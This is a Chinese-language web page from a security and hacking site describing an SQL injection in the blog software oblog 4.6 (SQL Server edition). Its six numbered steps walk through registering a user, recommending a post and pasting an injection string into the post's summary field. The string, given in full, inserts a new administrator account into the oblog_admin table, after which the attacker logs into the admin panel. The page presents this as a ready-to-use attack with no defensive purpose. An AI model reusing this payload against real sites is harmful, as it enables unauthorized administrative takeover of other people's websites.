首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

oblog4.6添加后台管理员漏洞(仅适用于sql版)


http://www.gipsky.com/
1、注册一个用户,用户名script,密码123456

2、发布一篇日志,日志标题:测试一下

3、个人前台首页找到日志"测试一下",点"推荐"

4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:s'/**/WHERE/**/logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--

5、最后点"确认提交"按钮,如果提示修改成功,注入完成!

6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功!
<< 犀利的 oracle 注入技术 国内黑客发布软件 应对10月20日微软XP恐怖黑屏 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号